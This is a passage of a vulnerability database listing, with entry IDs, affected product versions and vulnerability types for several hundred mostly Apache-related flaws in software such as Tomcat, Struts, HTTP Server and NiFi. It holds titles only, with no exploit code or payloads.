3662| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
3663| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
3664| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
3665| [121354] Apache CouchDB HTTP API Code Execution
3666| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
3667| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
3668| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
3669| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
3670| [120168] Apache CXF weak authentication
3671| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
3672| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
3673| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
3674| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
3675| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
3676| [119306] Apache MXNet Network Interface privilege escalation
3677| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
3678| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
3679| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
3680| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
3681| [118143] Apache NiFi activemq-client Library Deserialization denial of service
3682| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
3683| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
3684| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
3685| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
3686| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
3687| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
3688| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
3689| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
3690| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
3691| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
3692| [117115] Apache Tika up to 1.17 tika-server command injection
3693| [116929] Apache Fineract getReportType Parameter privilege escalation
3694| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
3695| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
3696| [116926] Apache Fineract REST Parameter privilege escalation
3697| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
3698| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
3699| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
3700| [115883] Apache Hive up to 2.3.2 privilege escalation
3701| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
3702| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
3703| [115518] Apache Ignite 2.3 Deserialization privilege escalation
3704| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
3705| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
3706| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
3707| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
3708| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
3709| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
3710| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
3711| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
3712| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
3713| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
3714| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
3715| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
3716| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
3717| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
3718| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
3719| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
3720| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
3721| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
3722| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
3723| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
3724| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
3725| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
3726| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
3727| [113895] Apache Geode up to 1.3.x Code Execution
3728| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
3729| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
3730| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
3731| [113747] Apache Tomcat Servlets privilege escalation
3732| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
3733| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
3734| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
3735| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
3736| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
3737| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
3738| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
3739| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
3740| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
3741| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
3742| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
3743| [112885] Apache Allura up to 1.8.0 File information disclosure
3744| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
3745| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
3746| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
3747| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
3748| [112625] Apache POI up to 3.16 Loop denial of service
3749| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
3750| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
3751| [112339] Apache NiFi 1.5.0 Header privilege escalation
3752| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
3753| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
3754| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
3755| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
3756| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
3757| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
3758| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
3759| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
3760| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
3761| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
3762| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
3763| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
3764| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
3765| [112114] Oracle 9.1 Apache Log4j privilege escalation
3766| [112113] Oracle 9.1 Apache Log4j privilege escalation
3767| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
3768| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
3769| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
3770| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
3771| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
3772| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
3773| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
3774| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
3775| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
3776| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
3777| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
3778| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
3779| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
3780| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
3781| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
3782| [110701] Apache Fineract Query Parameter sql injection
3783| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
3784| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
3785| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
3786| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
3787| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
3788| [110106] Apache CXF Fediz Spring cross site request forgery
3789| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
3790| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
3791| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
3792| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
3793| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
3794| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
3795| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
3796| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
3797| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
3798| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
3799| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
3800| [108938] Apple macOS up to 10.13.1 apache denial of service
3801| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
3802| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
3803| [108935] Apple macOS up to 10.13.1 apache denial of service
3804| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
3805| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
3806| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
3807| [108931] Apple macOS up to 10.13.1 apache denial of service
3808| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
3809| [108929] Apple macOS up to 10.13.1 apache denial of service
3810| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
3811| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
3812| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
3813| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
3814| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
3815| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
3816| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
3817| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
3818| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
3819| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
3820| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
3821| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
3822| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
3823| [108782] Apache Xerces2 XML Service denial of service
3824| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
3825| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
3826| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
3827| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
3828| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
3829| [108629] Apache OFBiz up to 10.04.01 privilege escalation
3830| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
3831| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
3832| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
3833| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
3834| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
3835| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
3836| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
3837| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
3838| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
3839| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
3840| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
3841| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
3842| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
3843| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
3844| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
3845| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
3846| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
3847| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
3848| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
3849| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
3850| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
3851| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
3852| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
3853| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
3854| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
3855| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
3856| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
3857| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
3858| [107639] Apache NiFi 1.4.0 XML External Entity
3859| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
3860| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
3861| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
3862| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
3863| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
3864| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
3865| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
3866| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
3867| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
3868| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
3869| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
3870| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
3871| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
3872| [107197] Apache Xerces Jelly Parser XML File XML External Entity
3873| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
3874| [107084] Apache Struts up to 2.3.19 cross site scripting
3875| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
3876| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
3877| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
3878| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
3879| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
3880| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
3881| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
3882| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
3883| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
3884| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
3885| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
3886| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
3887| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
3888| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
3889| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
3890| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
3891| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
3892| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
3893| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
3894| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
3895| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
3896| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
3897| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
3898| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
3899| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
3900| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
3901| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
3902| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
3903| [105878] Apache Struts up to 2.3.24.0 privilege escalation
3904| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
3905| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
3906| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
3907| [105643] Apache Pony Mail up to 0.8b weak authentication
3908| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
3909| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
3910| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
3911| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
3912| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
3913| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
3914| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
3915| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
3916| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
3917| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
3918| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
3919| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
3920| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
3921| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
3922| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
3923| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
3924| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
3925| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
3926| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
3927| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
3928| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
3929| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
3930| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
3931| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
3932| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
3933| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
3934| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
3935| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
3936| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
3937| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
3938| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
3939| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
3940| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
3941| [103690] Apache OpenMeetings 1.0.0 sql injection
3942| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
3943| [103688] Apache OpenMeetings 1.0.0 weak encryption
3944| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
3945| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
3946| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
3947| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
3948| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
3949| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
3950| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
3951| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
3952| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
3953| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
3954| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
3955| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
3956| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
3957| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
3958| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
3959| [103352] Apache Solr Node weak authentication
3960| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
3961| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
3962| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
3963| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
3964| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
3965| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
3966| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
3967| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
3968| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
3969| [102536] Apache Ranger up to 0.6 Stored cross site scripting
3970| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
3971| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
3972| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
3973| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
3974| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
3975| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
3976| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
3977| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
3978| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
3979| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
3980| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
3981| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
3982| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
3983| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
3984| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
3985| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
3986| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
3987| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
3988| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
3989| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
3990| [99937] Apache Batik up to 1.8 privilege escalation
3991| [99936] Apache FOP up to 2.1 privilege escalation
3992| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
3993| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
3994| [99930] Apache Traffic Server up to 6.2.0 denial of service
3995| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
3996| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
3997| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
3998| [117569] Apache Hadoop up to 2.7.3 privilege escalation
3999| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
4000| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
4001| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
4002| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
4003| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
4004| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
4005| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
4006| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
4007| [99014] Apache Camel Jackson/JacksonXML privilege escalation
4008| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
4009| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
4010| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
